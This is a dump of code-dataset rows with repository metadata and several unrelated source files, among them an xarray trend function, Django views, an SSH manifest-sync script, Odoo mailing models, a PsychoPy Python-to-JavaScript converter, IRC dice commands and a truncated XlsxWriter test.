repo_name (string, 5-92 chars) | path (string, 4-221 chars) | copies (string, 19 classes) | size (string, 4-6 chars) | content (string, 766-896k chars) | license (string, 15 classes) | hash (int64) | line_mean (float64, 6.51-99.9) | line_max (int64, 32-997) | alpha_frac (float64, 0.25-0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5-13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ceos-seo/data_cube_utilities | data_cube_utilities/trend.py | 1 | 2098 | from functools import partial
from itertools import islice, product
import numpy as np
import xarray as xr
def __where_not_nan(arr: np.ndarray):
"""Finds position of not nan values in an nd-array
Args:
arr (numpy.ndarray): nd-array with nan values
Returns:
data (xr.DataArray): nd-array with indices of finite(not nan) values
"""
return np.where(np.isfinite(arr))
def __flatten_shallow(arr):
"""Flattens first two axes of nd-array
Args:
arr (numpy.ndarray): nd-array with dimensions (n, m)
Returns:
arr (numpy.ndarray): nd-array with dimensions (n*m)
"""
# TODO: Done in a hurry, Find numpy native way of resizing
return arr.reshape(arr.shape[0] * arr.shape[1])
def __linear_fit(da: xr.DataArray):
"""Applies linear regression on a 1-D xr.DataArray.
Args:
da (xr.DataArray): 1-D Data-Array being manipulated.
Returns:
        data (xr.DataArray): DataArray with a single element (slope of regression).
"""
xs = np.array(list(range(len(da.time))))
ys = __flatten_shallow(da.values)
not_nan = __where_not_nan(ys)[0].astype(int)
xs = xs[not_nan]
ys = ys[not_nan]
pf = np.polyfit(xs,ys, 1)
return xr.DataArray(pf[0])
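# A hypothetical use of the `linear` reducer defined below (the dataset and
# variable names here are assumptions for illustration, not from this module):
#   slope_map = linear(dataset.ndvi)  # 2-D DataArray of per-pixel trend slopes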
def linear(da: xr.DataArray):
"""Reduces xarray along a time component. The reduction yields a slope for each spatial coordinate in the xarray.
Args:
da (xr.DataArray): 3-D Data-Array being manipulated. `latitude` and `longitude` are required dimensions.
Returns:
linear_trend_product (xr.DataArray): 2-D Data-Array
"""
# TODO: Decouple from coordinate system, and allow regression along multiple components.
stacked = da.stack(allpoints = ['latitude',
'longitude'])
trend = stacked.groupby('allpoints').apply(__linear_fit)
unstacked = trend.unstack('allpoints')
return unstacked.rename(dict(allpoints_level_0 = "latitude",
allpoints_level_1 = "longitude")) | apache-2.0 | 7,278,287,998,188,780,000 | 28.56338 | 118 | 0.621544 | false | 3.674256 | false | false | false |
pony-revolution/helpothers | helpothers/views.py | 1 | 1239 | from django.contrib.auth import get_user_model
from django.views.generic.base import TemplateView
from django.views.generic.detail import DetailView
from django.views.generic.edit import UpdateView
from .views_mixins import HelpOthersMetaDataMixin
from listings.models import GatheringCenter, Resource
class HomeView(HelpOthersMetaDataMixin, TemplateView):
template_name = 'home.html'
def get_context_data(self, **kwargs):
context = super(HomeView, self).get_context_data(**kwargs)
context['gathering_centers'] = GatheringCenter.objects.filter(published=True)
context['resources'] = Resource.objects.filter(published=True)
return context
class LoginView(HelpOthersMetaDataMixin, TemplateView):
template_name = 'login.html'
def get_context_data(self, **kwargs):
ctx = super(LoginView, self).get_context_data(**kwargs)
ctx['next'] = self.request.GET.get('next')
return ctx
class ProfileView(HelpOthersMetaDataMixin, UpdateView):
context_object_name = 'profile'
template_name = 'accounts/profile.html'
fields = ('user__first_name', 'user__last_name', 'user__email')
def get_object(self, queryset=None):
return self.request.user.profile
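# Sketch of how these views might be wired into a URLconf; the route patterns
# and names below are assumptions for illustration, not taken from this project:
#   urlpatterns = [
#       url(r'^$', HomeView.as_view(), name='home'),
#       url(r'^login/$', LoginView.as_view(), name='login'),
#       url(r'^profile/$', ProfileView.as_view(), name='profile'),
#   ]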
| apache-2.0 | -828,806,971,788,788,700 | 34.4 | 85 | 0.727199 | false | 3.812308 | false | false | false |
scattering/ipeek | server/pull_push_expman.py | 1 | 6015 | import glob
import os
import sys
sys.path.append('/var/www/')
sys.path.append('/home/bbm/')
import paramiko
import urllib2, ftplib
import time
import StringIO
import json
DEBUG = False
RETRIEVE_METHOD = "ssh" # or "ftp" or "urllib"
MAX_FTP_RETRIES = 5
HOST_PORT = 22
DEFAULT_PATH = "/usr/local/nice/server_data/experiments/manifest/experiment_manifest.backup"
sources = [
{"name": "NSE",
"host_name": "echo.ncnr.nist.gov"},
{"name": "MAGIK",
"host_name": "magik.ncnr.nist.gov"},
{"name": "NG7",
"host_name": "ng7refl.ncnr.nist.gov"},
{"name": "PBR",
"host_name": "pbr.ncnr.nist.gov"},
{"name": "NGBSANS",
"host_name": "ngbsans.ncnr.nist.gov"},
{"name": "NGB30SANS",
"host_name": "ngb30sans.ncnr.nist.gov"},
{"name": "NG7SANS",
"host_name": "ng7sans.ncnr.nist.gov"},
{"name": "PHADES",
"host_name": "cts.ncnr.nist.gov"},
{"name": "VSANS",
"host_name": "vsans.ncnr.nist.gov"},
]
output = {}
output_filelike = {}
#local_path = "/home/bbm/.livedata/DCS/"
dest_host = "webster.ncnr.nist.gov" #hard-coded
dest_port = 22
# I have a different key for pushing to webster.
dest_pkey = paramiko.RSAKey(filename='/home/bbm/.ssh/datapushkey')
dest_username = "bbm"
def retrieve_ftp(source_host, source_port, file_path, output_buffer, username):
ftp = ftplib.FTP(source_host)
ftp.login('anonymous')
live_datapath = os.path.dirname(file_path)
live_dataname = os.path.basename(file_path)
ftp.cwd(live_datapath)
ftp.retrbinary("RETR " + live_dataname, output_buffer.write)
ftp.close()
def retrieve_ssh(source_host, source_port, file_path, output_buffer, username):
source_transport = paramiko.Transport((source_host, source_port))
source_transport.window_size = 2147483647
source_transport.use_compression(True)
source_pkey = paramiko.RSAKey(filename="/home/bbm/.ssh/datapullkey")
source_username = username
source_transport.connect(username=source_username, pkey = source_pkey)
source_sftp = paramiko.SFTPClient.from_transport(source_transport)
if DEBUG:
print("starting read:", name, os.path.basename(file_path))
f = source_sftp.open(file_path)
response = f.read()
f.close()
if DEBUG:
print("ending read:", name, os.path.basename(file_path))
output_buffer.write(response)
if DEBUG:
print("ending stringIO:", name, os.path.basename(file_path))
def retrieve_urllib(source_host, source_port, file_path, output_buffer, username):
req_addr = os.path.join("ftp://" + source_host, live_datapath, live_dataname)
#req = urllib2.Request(req_addr)
response = None
retries = 0
while retries < MAX_FTP_RETRIES:
try:
response = urllib2.urlopen(req_addr)
break
except:
print("failed attempt %d to retrieve %s: trying again" % (retries, req_addr))
retries += 1
if response is None: return
if DEBUG:
print("retrieved %s" % (req_addr))
output_buffer.write(response.read())
retrievers = {
"ssh": retrieve_ssh,
"urllib": retrieve_urllib,
"ftp": retrieve_ftp
}
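# The retrieval back-end is picked per source in the main loop below via
# RETRIEVE_METHOD or a source's own "retrieve_method" entry, e.g.
# retrievers["ssh"] -> retrieve_ssh.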
def strip_header(manifest):
json_start = manifest.find('[')
return manifest[json_start:]
def strip_emails(manifest):
manifest_obj = json.loads(manifest)
for expt in manifest_obj:
expt['value']['value'].pop('emails', None)
return json.dumps(manifest_obj)
def strip_emails_and_proprietary(manifest):
    manifest_obj = json.loads(manifest)
    # filter first: popping entries while iterating skips the element that
    # follows each removal, so non-NORMAL experiments could slip through
    manifest_obj = [expt for expt in manifest_obj
                    if expt['value']['value'].get('publish', '') == 'NORMAL']
    for expt in manifest_obj:
        expt['value']['value'].pop('emails', None)
    return json.dumps(manifest_obj)
filters = [strip_header, strip_emails_and_proprietary]
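# Shape of a manifest entry as implied by the filters above (field values are
# illustrative assumptions only):
#   {"key": ..., "value": {"value": {"publish": "NORMAL", "emails": [...], ...}}}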
for source in sources:
retrieve_method = source.get('retrieve_method', RETRIEVE_METHOD)
name = source['name']
username = source.get('username', 'ncnr')
source_host = source['host_name']
source_port = source.get('host_port', HOST_PORT)
live_datapath = source.get('manifest_path', DEFAULT_PATH)
try:
live_data = StringIO.StringIO()
retriever = retrievers.get(retrieve_method, lambda *args: None)
retriever(source_host, source_port, live_datapath, live_data, username)
live_data.seek(0) # move back to the beginning of file
output.setdefault(name, {})
filename = os.path.basename(live_datapath)
result = live_data.read()
for f in filters:
result = f(result)
output[name][filename] = result
except Exception as e:
if DEBUG:
print "could not connect to %s because of %s\n" % (name,str(e))
# Now initialize the transfer to the destination:
dest_transport = paramiko.Transport((dest_host, dest_port))
dest_transport.connect(username = dest_username, pkey = dest_pkey)
dest_transport.window_size = 2147483647
dest_transport.use_compression(True)
dest_sftp = paramiko.SFTPClient.from_transport(dest_transport)
for name in output:
#name = source['name']
for json_filename in output[name].keys():
# now I push that file outside the firewall to webster:
remote_tmp = os.path.join('ipeek_html', 'data', name, json_filename + ".tmp")
remotedir = os.path.join('ipeek_html', 'data', name)
remotepath = os.path.join('ipeek_html', 'data', name, json_filename)
if DEBUG:
print "starting write:", name, json_filename
f = dest_sftp.open(remote_tmp, 'w')
f.write(output[name][json_filename])
f.close()
if json_filename in dest_sftp.listdir(remotedir):
dest_sftp.unlink(remotepath)
dest_sftp.rename(remote_tmp, remotepath)
if DEBUG:
print "ending write:", name, json_filename
dest_sftp.close()
dest_transport.close()
#print 'Upload done.'
| unlicense | 4,076,488,242,616,512,000 | 33.371429 | 92 | 0.635411 | false | 3.317705 | false | false | false |
jrichte43/ProjectEuler | Problem-0121/solutions.py | 1 | 1722 |
__problem_title__ = "Disc game prize fund"
__problem_url___ = "https://projecteuler.net/problem=121"
__problem_description__ = "A bag contains one red disc and one blue disc. In a game of chance a " \
"player takes a disc at random and its colour is noted. After each " \
"turn the disc is returned to the bag, an extra red disc is added, and " \
"another disc is taken at random. The player pays £1 to play and wins " \
"if they have taken more blue discs than red discs at the end of the " \
"game. If the game is played for four turns, the probability of a " \
"player winning is exactly 11/120, and so the maximum prize fund the " \
"banker should allocate for winning in this game would be £10 before " \
"they would expect to incur a loss. Note that any payout will be a " \
"whole number of pounds and also includes the original £1 paid to play " \
"the game, so in the example given the player actually wins £9. Find " \
"the maximum prize fund that should be allocated to a single game in " \
"which fifteen turns are played."
import timeit
from math import factorial
class Solution():
    @staticmethod
    def solution1():
        # Weighted count of draw sequences: at turn i the single blue disc has
        # weight 1 and the i red discs have combined weight i (out of i + 1 discs).
        turns = 15
        dp = [1]  # dp[b] = weighted number of sequences with b blue discs so far
        for i in range(1, turns + 1):
            new = [w * i for w in dp] + [0]   # a red disc is drawn this turn
            for b, w in enumerate(dp):
                new[b + 1] += w               # the blue disc is drawn this turn
            dp = new
        wins = sum(w for b, w in enumerate(dp) if b > turns - b)
        total = factorial(turns + 1)
        # largest whole-pound prize fund (including the £1 stake) that does not
        # give the player a positive expectation; the 4-turn example 11/120 -> 10
        return total // wins
@staticmethod
def time_solutions():
setup = 'from __main__ import Solution'
print('Solution 1:', timeit.timeit('Solution.solution1()', setup=setup, number=1))
if __name__ == '__main__':
s = Solution()
print(s.solution1())
s.time_solutions()
| gpl-3.0 | 5,942,483,616,002,205,000 | 45.432432 | 100 | 0.5617 | false | 4.338384 | false | false | false |
gurneyalex/odoo | addons/mass_mailing/models/mailing_contact.py | 5 | 5454 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
from odoo.osv import expression
class MassMailingContactListRel(models.Model):
""" Intermediate model between mass mailing list and mass mailing contact
Indicates if a contact is opted out for a particular list
"""
_name = 'mailing.contact.subscription'
_description = 'Mass Mailing Subscription Information'
_table = 'mailing_contact_list_rel'
_rec_name = 'contact_id'
contact_id = fields.Many2one('mailing.contact', string='Contact', ondelete='cascade', required=True)
list_id = fields.Many2one('mailing.list', string='Mailing List', ondelete='cascade', required=True)
opt_out = fields.Boolean(string='Opt Out',
help='The contact has chosen not to receive mails anymore from this list', default=False)
unsubscription_date = fields.Datetime(string='Unsubscription Date')
message_bounce = fields.Integer(related='contact_id.message_bounce', store=False, readonly=False)
is_blacklisted = fields.Boolean(related='contact_id.is_blacklisted', store=False, readonly=False)
_sql_constraints = [
('unique_contact_list', 'unique (contact_id, list_id)',
'A contact cannot be subscribed multiple times to the same list!')
]
@api.model
def create(self, vals):
if 'opt_out' in vals:
vals['unsubscription_date'] = vals['opt_out'] and fields.Datetime.now()
return super(MassMailingContactListRel, self).create(vals)
def write(self, vals):
if 'opt_out' in vals:
vals['unsubscription_date'] = vals['opt_out'] and fields.Datetime.now()
return super(MassMailingContactListRel, self).write(vals)
class MassMailingContact(models.Model):
"""Model of a contact. This model is different from the partner model
because it holds only some basic information: name, email. The purpose is to
be able to deal with large contact list to email without bloating the partner
base."""
_name = 'mailing.contact'
_inherit = ['mail.thread.blacklist']
_description = 'Mailing Contact'
_order = 'email'
name = fields.Char()
company_name = fields.Char(string='Company Name')
title_id = fields.Many2one('res.partner.title', string='Title')
email = fields.Char('Email')
list_ids = fields.Many2many(
'mailing.list', 'mailing_contact_list_rel',
'contact_id', 'list_id', string='Mailing Lists')
subscription_list_ids = fields.One2many('mailing.contact.subscription', 'contact_id', string='Subscription Information')
country_id = fields.Many2one('res.country', string='Country')
tag_ids = fields.Many2many('res.partner.category', string='Tags')
opt_out = fields.Boolean('Opt Out', compute='_compute_opt_out', search='_search_opt_out',
                             help='Opt out flag for a specific mailing list. '
'This field should not be used in a view without a unique and active mailing list context.')
@api.model
def _search_opt_out(self, operator, value):
# Assumes operator is '=' or '!=' and value is True or False
if operator != '=':
if operator == '!=' and isinstance(value, bool):
value = not value
else:
raise NotImplementedError()
if 'default_list_ids' in self._context and isinstance(self._context['default_list_ids'], (list, tuple)) and len(self._context['default_list_ids']) == 1:
[active_list_id] = self._context['default_list_ids']
contacts = self.env['mailing.contact.subscription'].search([('list_id', '=', active_list_id)])
return [('id', 'in', [record.contact_id.id for record in contacts if record.opt_out == value])]
else:
return expression.FALSE_DOMAIN if value else expression.TRUE_DOMAIN
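    # Example (hypothetical list id): with a single active list in the context,
    #   contacts.with_context(default_list_ids=[7]).search([('opt_out', '=', False)])
    # resolves through _search_opt_out above.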
@api.depends('subscription_list_ids')
def _compute_opt_out(self):
if 'default_list_ids' in self._context and isinstance(self._context['default_list_ids'], (list, tuple)) and len(self._context['default_list_ids']) == 1:
[active_list_id] = self._context['default_list_ids']
for record in self:
active_subscription_list = record.subscription_list_ids.filtered(lambda l: l.list_id.id == active_list_id)
record.opt_out = active_subscription_list.opt_out
else:
for record in self:
record.opt_out = False
def get_name_email(self, name):
name, email = self.env['res.partner']._parse_partner_name(name)
if name and not email:
email = name
if email and not name:
name = email
return name, email
@api.model
def name_create(self, name):
name, email = self.get_name_email(name)
contact = self.create({'name': name, 'email': email})
return contact.name_get()[0]
@api.model
def add_to_list(self, name, list_id):
name, email = self.get_name_email(name)
contact = self.create({'name': name, 'email': email, 'list_ids': [(4, list_id)]})
return contact.name_get()[0]
def _message_get_default_recipients(self):
return {r.id: {
'partner_ids': [],
'email_to': r.email_normalized,
'email_cc': False}
for r in self
}
| agpl-3.0 | 5,388,405,574,171,539,000 | 44.831933 | 160 | 0.632013 | false | 3.915291 | false | false | false |
dannywxh/mypy | spider/avso.py | 1 | 5739 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, re, time, sys
from bs4 import BeautifulSoup
import common
import requests
reload(sys)
#print sys.getdefaultencoding()
sys.setdefaultencoding('utf-8')
print sys.getdefaultencoding()
def download_html(url):
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, compress',
'Accept-Language': 'en-us;q=0.5,en;q=0.3',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}
print "download from "+url+"\n"
    response = requests.get(url=url,headers=headers,timeout=5) # the most basic GET request
#print "status_code",response.status_code
if response.ok:
#print response.content.encode("gbk")
#return StringIO.StringIO(response.content)
data=response.content
return data
##### The following handles avso; it could be wrapped into a class #################
def get_cast_onepage_by_avso(cast_name,pagecount=1):
url=r'https://avso.pw/cn/search/'+cast_name+'/page/'+str(pagecount)
data=download_html(url)
if data:
#print response.content.encode("gbk")
soup = BeautifulSoup(data,"html.parser")
ret=[]
try:
            notfound=soup.find('div',class_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
divs=soup.find_all('div',class_="item")
if divs==None:
print "divs is None!"
return
for div in divs:
info=div.find('div',class_="photo-info")
name=div.find('span')
#print name.text
datas=info.find_all('date')
ret.append((name.text,datas[0].text,datas[1].text))
return ret
except Exception,e:
print e
return -1
#print "vcast not found!"
def get_cast_allpage_by_avso(cast_name):
all_info=[]
for i in range(1,10):
info= get_cast_onepage_by_avso(cast_name,i)
if info==-1:
break
else:
all_info+=info
print all_info
savefile="d:\\"+cast_name+".txt"
with open(savefile,"w") as fs:
for name,vid,date in all_info:
fs.write(name.encode("utf-8")+"\t"+vid+"\t"+date+"\n")
print "file create done!"
# step:1
def serch_movie_byvid(vid):
url='https://avso.pw/cn/search/'+vid
#url='https://avso.pw/cn/search/'+vid #110615_185'
data=download_html(url)
if data:
#print response.content.encode("gbk")
soup = BeautifulSoup(data,"lxml")
ret=[]
try:
notfound=soup.find('div',class_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
types = soup.select('div.item > a')
items = soup.select('div.item > a > div.photo-info > span')
for a,item in zip(types,items):
#print a['class'][1],a['href'],item.get_text() # ['movie-box', 'mcaribbeancom']
cast=get_movie_cast(a['href'])
ret.append((item.get_text(),cast,a['class'][1]))
return ret
except Exception,e:
print e
return -1
#print "vcast not found!"
#step 2: get the names of all cast members for the movie
def get_movie_cast(url):
# url=r' https://avso.pw/cn/movie/yus'
data=download_html(url)
ret=[]
if data:
soup = BeautifulSoup(data,"lxml")
try:
            notfound=soup.find('div',class_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
actress=soup.find_all('a',class_="avatar-box")
for a in actress:
span=a.find("span")
ret.append(span.text)
return " ".join(ret)
except Exception,e:
print e
return -1
#print "vcast not found!"
#wrapper function
def get_vidlist_full_info():
#idlist=['082516-001','080117_01','062717_110']
idlist= walkpath(r"e:\\avstore")
print idlist
infos=[]
for id in idlist:
info = serch_movie_byvid(id)
if info!=-1:
infos+=info
#print infos
infofile='d:\\info.txt'
with open(infofile,"w") as f:
for a,b,c in infos:
print a,b,c
f.write(a+","+b+","+c+"\n")
print "File saved!%s"%infofile
def walkpath(path):
files=[x for x in os.listdir(path) if all([os.path.splitext(x)[1]=='.txt', not os.path.isdir(path+"\\"+x)])]
store=[]
for txtfile in files:
for line in open(path+"/"+txtfile):
p,f=os.path.split(line)
id=common.format_rule1(f.replace("\n",""))
if id!="":
#store.append((id,txtfile))
store.append(id)
return store
if __name__ == '__main__' :
#TXT_STORE_PATH="d:\\avstore\\"
get_vidlist_full_info()
# idlist=['082516-001','080117_01','062717_110']
#ret=serch_movie_byvid('082516-001')
#for a,b,c in ret:
# print a,b,c
| apache-2.0 | 8,082,208,100,537,435,000 | 24.361607 | 112 | 0.492871 | false | 3.528571 | false | false | false |
psychopy/psychopy | psychopy/experiment/py2js.py | 1 | 7669 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Part of the PsychoPy library
# Copyright (C) 2002-2018 Jonathan Peirce (C) 2019-2021 Open Science Tools Ltd.
# Distributed under the terms of the GNU General Public License (GPL).
"""Converting code parameters and components from python (PsychoPy)
to JS (ES6/PsychoJS)
"""
import ast
import astunparse
import esprima
from os import path
from psychopy.constants import PY3
from psychopy import logging
if PY3:
from past.builtins import unicode
from io import StringIO
else:
from StringIO import StringIO
from psychopy.experiment.py2js_transpiler import translatePythonToJavaScript
class NamesJS(dict):
def __getitem__(self, name):
try:
return dict.__getitem__(self, name)
except:
return "{}".format(name)
namesJS = NamesJS()
namesJS['sin'] = 'Math.sin'
namesJS['cos'] = 'Math.cos'
namesJS['tan'] = 'Math.tan'
namesJS['pi'] = 'Math.PI'
namesJS['rand'] = 'Math.random'
namesJS['random'] = 'Math.random'
namesJS['sqrt'] = 'Math.sqrt'
namesJS['abs'] = 'Math.abs'
namesJS['randint'] = 'util.randint'
namesJS['round'] = 'util.round' # better than Math.round, supports n DPs arg
namesJS['sum'] = 'util.sum'
class TupleTransformer(ast.NodeTransformer):
""" An ast subclass that walks the abstract syntax tree and
allows modification of nodes.
This class transforms a tuple to a list.
:returns node
"""
def visit_Tuple(self, node):
return ast.List(node.elts, node.ctx)
class Unparser(astunparse.Unparser):
"""astunparser had buried the future_imports option underneath its init()
so we need to override that method and change it."""
def __init__(self, tree, file):
"""Unparser(tree, file=sys.stdout) -> None.
Print the source for tree to file."""
self.f = file
self.future_imports = ['unicode_literals']
self._indent = 0
self.dispatch(tree)
self.f.flush()
def unparse(tree):
v = StringIO()
Unparser(tree, file=v)
return v.getvalue()
def expression2js(expr):
"""Convert a short expression (e.g. a Component Parameter) Python to JS"""
# if the code contains a tuple (anywhere), convert parenths to be list.
# This now works for compounds like `(2*(4, 5))` where the inner
# parenths becomes a list and the outer parens indicate priority.
# This works by running an ast transformer class to swap the contents of the tuple
# into a list for the number of tuples in the expression.
try:
syntaxTree = ast.parse(expr)
except Exception:
try:
syntaxTree = ast.parse(unicode(expr))
except Exception as err:
logging.error(err)
return
for node in ast.walk(syntaxTree):
TupleTransformer().visit(node) # Transform tuples to list
# for py2 using 'unicode_literals' we don't want
if isinstance(node, ast.Str) and type(node.s)==bytes:
node.s = unicode(node.s, 'utf-8')
elif isinstance(node, ast.Str) and node.s.startswith("u'"):
node.s = node.s[1:]
if isinstance(node, ast.Name):
if node.id == 'undefined':
continue
node.id = namesJS[node.id]
jsStr = unparse(syntaxTree).strip()
if not any(ch in jsStr for ch in ("=",";","\n")):
try:
jsStr = translatePythonToJavaScript(jsStr)
if jsStr.endswith(';\n'):
jsStr = jsStr[:-2]
except:
# If translation fails, just use old translation
pass
return jsStr
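# For instance, expression2js("sin(t)") rewrites the name `sin` to `Math.sin`
# through the namesJS table above before the final transpiler pass (see the
# examples exercised in the __main__ block below).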
def snippet2js(expr):
"""Convert several lines (e.g. a Code Component) Python to JS"""
# for now this is just adding ';' onto each line ending so will fail on
# most code (e.g. if... for... will certainly fail)
# do nothing for now
return expr
def findUndeclaredVariables(ast, allUndeclaredVariables):
"""Detect undeclared variables
"""
undeclaredVariables = []
for expression in ast:
if expression.type == 'ExpressionStatement':
expression = expression.expression
if expression.type == 'AssignmentExpression' and expression.operator == '=' and expression.left.type == 'Identifier':
variableName = expression.left.name
if variableName not in allUndeclaredVariables:
undeclaredVariables.append(variableName)
allUndeclaredVariables.append(variableName)
elif expression.type == 'IfStatement':
if expression.consequent.body is None:
consequentVariables = findUndeclaredVariables(
[expression.consequent], allUndeclaredVariables)
else:
consequentVariables = findUndeclaredVariables(
expression.consequent.body, allUndeclaredVariables)
undeclaredVariables.extend(consequentVariables)
elif expression.type == "ReturnStatement":
if expression.argument.type == "FunctionExpression":
consequentVariables = findUndeclaredVariables(
expression.argument.body.body, allUndeclaredVariables)
undeclaredVariables.extend(consequentVariables)
return undeclaredVariables
def addVariableDeclarations(inputProgram, fileName):
"""Transform the input program by adding just before each function
a declaration for its undeclared variables
"""
# parse Javascript code into abstract syntax tree:
# NB: esprima: https://media.readthedocs.org/pdf/esprima/4.0/esprima.pdf
try:
ast = esprima.parseScript(inputProgram, {'range': True, 'tolerant': True})
except esprima.error_handler.Error as err:
logging.error("{0} in {1}".format(err, path.split(fileName)[1]))
return inputProgram # So JS can be written to file
# find undeclared vars in functions and declare them before the function
outputProgram = inputProgram
offset = 0
allUndeclaredVariables = []
for expression in ast.body:
if expression.type == 'FunctionDeclaration':
# find all undeclared variables:
undeclaredVariables = findUndeclaredVariables(expression.body.body,
allUndeclaredVariables)
# add declarations (var) just before the function:
funSpacing = ['', '\n'][len(undeclaredVariables) > 0] # for consistent function spacing
declaration = funSpacing + '\n'.join(['var ' + variable + ';' for variable in
undeclaredVariables]) + '\n'
startIndex = expression.range[0] + offset
outputProgram = outputProgram[
:startIndex] + declaration + outputProgram[
startIndex:]
offset += len(declaration)
return outputProgram
if __name__ == '__main__':
for expr in ['sin(t)', 't*5',
'(3, 4)', '(5*-2)', # tuple and not tuple
'(1,(2,3), (1,2,3), (-4,-5,-6))', '2*(2, 3)', # combinations
'[1, (2*2)]', # List with nested operations returns list + nested tuple
'(.7, .7)', # A tuple returns list
'(-.7, .7)', # A tuple with unary operators returns nested lists
'[-.7, -.7]', # A list with unary operators returns list with nested tuple
'[-.7, (-.7 * 7)]']: # List with unary operators and nested tuple with operations returns list + tuple
print("{} -> {}".format(repr(expr), repr(expression2js(expr))))
| gpl-3.0 | 7,784,150,697,449,166,000 | 36.778325 | 129 | 0.61716 | false | 4.154388 | false | false | false |
exp-publishing/cloudbot-plugins | plugins/gaming.py | 1 | 4430 | """
gaming.py
Dice, coins, and random generation for gaming.
Modified By:
- Luke Rogers <https://github.com/lukeroge>
- Josh Elsasser <https://github.com/jaelsasser>
License:
GPL v3
"""
import asyncio
import random
import re
from cloudbot import hook
whitespace_re = re.compile(r'\s+')
valid_diceroll = re.compile(r'^([+-]?(?:\d+|\d*d(?:\d+|F))(?:[+-](?:\d+|\d*d(?:\d+|F)))*)( .+)?$', re.I)
sign_re = re.compile(r'[+-]?(?:\d*d)?(?:\d+|F)', re.I)
split_re = re.compile(r'([\d+-]*)d?(F|\d*)', re.I)
def n_rolls(count, n):
"""roll an n-sided die count times
:type count: int
:type n: int | str
"""
if n == "F":
return [random.randint(-1, 1) for x in range(min(count, 100))]
if n < 2: # it's a coin
if count < 100:
return [random.randint(0, 1) for x in range(count)]
else: # fake it
return [int(random.normalvariate(.5 * count, (.75 * count) ** .5))]
else:
if count < 100:
return [random.randint(1, n) for x in range(count)]
else: # fake it
return [int(random.normalvariate(.5 * (1 + n) * count,
(((n + 1) * (2 * n + 1) / 6. -
(.5 * (1 + n)) ** 2) * count) ** .5))]
@asyncio.coroutine
@hook.command("roll", "dice")
def dice(text, notice):
"""<dice roll> - simulates dice rolls. Example: 'dice 2d20-d5+4 roll 2': D20s, subtract 1D5, add 4
:type text: str
"""
if hasattr(text, "groups"):
text, desc = text.groups()
else: # type(text) == str
match = valid_diceroll.match(whitespace_re.sub("", text))
if match:
text, desc = match.groups()
else:
notice("Invalid dice roll '{}'".format(text))
return
if "d" not in text:
return
spec = whitespace_re.sub('', text)
if not valid_diceroll.match(spec):
notice("Invalid dice roll '{}'".format(text))
return
groups = sign_re.findall(spec)
total = 0
rolls = []
for roll in groups:
count, side = split_re.match(roll).groups()
count = int(count) if count not in " +-" else 1
if side.upper() == "F": # fudge dice are basically 1d3-2
for fudge in n_rolls(count, "F"):
if fudge == 1:
rolls.append("\x033+\x0F")
elif fudge == -1:
rolls.append("\x034-\x0F")
else:
rolls.append("0")
total += fudge
elif side == "":
total += count
else:
side = int(side)
try:
if count > 0:
d = n_rolls(count, side)
rolls += list(map(str, d))
total += sum(d)
else:
d = n_rolls(-count, side)
rolls += [str(-x) for x in d]
total -= sum(d)
except OverflowError:
# I have never seen this happen. If you make this happen, you win a cookie
return "Thanks for overflowing a float, jerk >:["
if desc:
return "{}: {} ({})".format(desc.strip(), total, ", ".join(rolls))
else:
return "{} ({})".format(total, ", ".join(rolls))
@asyncio.coroutine
@hook.command("choice", "choose")
def choose(text, notice):
"""<choice1>, [choice2], [choice3], etc. - randomly picks one of the given choices
:type text: str
"""
choices = re.findall(r'([^,]+)', text)
if len(choices) == 1:
notice(choose.__doc__)
return
return random.choice(choices)
@asyncio.coroutine
@hook.command(autohelp=False)
def coin(text, notice, action):
"""[amount] - flips [amount] coins
:type text: str
"""
if text:
try:
amount = int(text)
except (ValueError, TypeError):
notice("Invalid input '{}': not a number".format(text))
return
else:
amount = 1
if amount == 1:
action("flips a coin and gets {}.".format(random.choice(["heads", "tails"])))
elif amount == 0:
action("makes a coin flipping motion")
else:
heads = int(random.normalvariate(.5 * amount, (.75 * amount) ** .5))
tails = amount - heads
action("flips {} coins and gets {} heads and {} tails.".format(amount, heads, tails))
| gpl-3.0 | 6,135,678,696,273,625,000 | 28.932432 | 104 | 0.499774 | false | 3.485445 | false | false | false |
ivmech/iviny-scope | lib/xlsxwriter/test/comparison/test_outline04.py | 1 | 2728 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013, John McNamara, [email protected]
#
import unittest
import os
from ...workbook import Workbook
from ..helperfunctions import _compare_xlsx_files
class TestCompareXLSXFiles(unittest.TestCase):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'outline04.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = ['xl/calcChain.xml', '[Content_Types].xml', 'xl/_rels/workbook.xml.rels']
self.ignore_elements = {}
def test_create_file(self):
"""
Test the creation of a outlines in a XlsxWriter file. These tests are
based on the outline programs in the examples directory.
"""
filename = self.got_filename
####################################################
workbook = Workbook(filename)
worksheet4 = workbook.add_worksheet('Outline levels')
levels = [
"Level 1", "Level 2", "Level 3", "Level 4", "Level 5", "Level 6",
"Level 7", "Level 6", "Level 5", "Level 4", "Level 3", "Level 2",
"Level 1"]
worksheet4.write_column('A1', levels)
worksheet4.set_row(0, None, None, {'level': 1})
worksheet4.set_row(1, None, None, {'level': 2})
worksheet4.set_row(2, None, None, {'level': 3})
worksheet4.set_row(3, None, None, {'level': 4})
worksheet4.set_row(4, None, None, {'level': 5})
worksheet4.set_row(5, None, None, {'level': 6})
worksheet4.set_row(6, None, None, {'level': 7})
worksheet4.set_row(7, None, None, {'level': 6})
worksheet4.set_row(8, None, None, {'level': 5})
worksheet4.set_row(9, None, None, {'level': 4})
worksheet4.set_row(10, None, None, {'level': 3})
